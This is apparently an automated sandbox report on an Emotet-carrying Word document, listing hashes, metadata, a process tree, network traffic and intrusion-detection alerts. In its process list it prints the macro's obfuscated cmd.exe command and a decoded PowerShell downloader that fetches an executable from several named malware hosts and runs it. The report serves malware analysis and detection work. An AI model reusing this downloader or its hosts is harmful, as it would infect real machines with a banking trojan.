File name: | IBAN_DE99 5040 8356 5899 3835 28.doc |
Full analysis: | https://app.any.run/tasks/ad49f922-fea4-4fca-9be7-02171c0aeb9e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 10:16:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 04:03:00 2018, Last Saved Time/Date: Fri Dec 14 04:03:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | C5DD395A55E41BDE9C40E2500A69ECA3 |
SHA1: | E26E6E9B952EA3F90F70687B349C78775D7C5AE0 |
SHA256: | 582E8E6C805A2FB1A8F75C8B8F7C310B8FFD3572768D1BD84130635C390CEFEA |
SSDEEP: | 1536:r7ljmW9/bvF292zDL3021fJ7XdUrnYJ3Nuw/+a9:nl/bvFo2QQfJjdUrnQ9u |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 04:03:00 |
ModifyDate: | 2018:12:14 04:03:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2844 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\IBAN_DE99 5040 8356 5899 3835 28.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3812 | c:\nYwjQcmSnzqz\oPirlnKKhU\rMzdQJEih\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2304 | CmD /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2492 | C:\Windows\system32\cmd.exe /S /D /c" echo $tsO='pIu';$nmh=new-object Net.WebClient;$NhU='http://cipriati.co.uk/w9@http://angullar.com.br/J5OZJ@http://cube.joburg/h@http://gentesanluis.com/nd5Udu3@http://basicki.com/p4mlXNts'.Split('@');$OSm='ANH';$cuk = '934';$DVh='sbz';$KdS=$env:temp+'\'+$cuk+'.exe';foreach($Gmf in $NhU){try{$nmh.DownloadFile($Gmf, $KdS);$DGw='TQH';If ((Get-Item $KdS).length -ge 80000) {Invoke-Item $KdS;$aCu='dYE';break;}}catch{}}$nwo='lfw';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2560 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1') DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3016 | C:\Windows\system32\cmd.exe /c assoc.psc1 | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3292 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3340 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | powershell.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: Personal | ||||
2100 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | 934.exe | |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: Personal | ||||
3624 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 934.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: Personal |
PID | Process | Filename | Type | |
---|---|---|---|---|
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR984E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\344093F1.wmf | — | |
MD5:— | SHA256:— | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B79DAC27.wmf | — | |
MD5:— | SHA256:— | |||
3292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JYT5CR160L4E8PD8E7OM.temp | — | |
MD5:— | SHA256:— | |||
3292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19b200.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA8C57B0.wmf | wmf | |
MD5:86615E1F8604036617AD3B59D748D666 | SHA256:167AF41799A5E7C3726DF24FE901C74436B265C003A146A3E98BB459B8BAAB6F | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:FD861AE6DAD43651988EA525BC25D1A8 | SHA256:EC537272DC9277B723DA61CAB2DC8CC4466A59423211FB5F4147EE27E22C74D7 | |||
3292 | powershell.exe | C:\Users\admin\AppData\Local\Temp\934.exe | executable | |
MD5:6B16787E1391447A02DFBAD0EC3DC696 | SHA256:695DDE02005872C92B00CEB56CFF716531065B477A1799418891C4FB443D4660 | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:74EA363455D9B70EA3153425443392D4 | SHA256:71D9B0C0BC9A010F225B11CBAB92BA09313A25AE7B2F381CF87EAE244DF84CF5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
684 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
3292 | powershell.exe | GET | — | 191.6.198.133:80 | http://angullar.com.br/J5OZJ/ | BR | — | — | malicious |
3292 | powershell.exe | GET | 200 | 198.12.153.174:80 | http://gentesanluis.com/nd5Udu3/ | US | executable | 120 Kb | malicious |
3292 | powershell.exe | GET | 503 | 212.227.94.120:80 | http://cipriati.co.uk/w9 | DE | html | 1.07 Kb | malicious |
684 | archivesymbol.exe | GET | — | 186.136.68.246:80 | http://186.136.68.246/ | AR | — | — | malicious |
684 | archivesymbol.exe | GET | 200 | 189.180.237.144:7080 | http://189.180.237.144:7080/ | MX | binary | 132 b | malicious |
3292 | powershell.exe | GET | 301 | 191.6.198.133:80 | http://angullar.com.br/J5OZJ | BR | html | 237 b | malicious |
3292 | powershell.exe | GET | 404 | 154.70.250.131:80 | http://cube.joburg/h | ZA | html | 260 b | malicious |
3292 | powershell.exe | GET | 301 | 198.12.153.174:80 | http://gentesanluis.com/nd5Udu3 | US | html | 373 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3292 | powershell.exe | 191.6.198.133:80 | angullar.com.br | IPV6 Internet Ltda | BR | malicious |
3292 | powershell.exe | 154.70.250.131:80 | cube.joburg | ICTGLOBE | ZA | malicious |
3292 | powershell.exe | 212.227.94.120:80 | cipriati.co.uk | 1&1 Internet SE | DE | suspicious |
3292 | powershell.exe | 198.12.153.174:80 | gentesanluis.com | GoDaddy.com, LLC | US | malicious |
684 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
684 | archivesymbol.exe | 189.180.237.144:7080 | — | Uninet S.A. de C.V. | MX | malicious |
684 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
cipriati.co.uk |
| malicious |
angullar.com.br |
| malicious |
cube.joburg |
| malicious |
gentesanluis.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3292 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3292 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3292 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
684 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |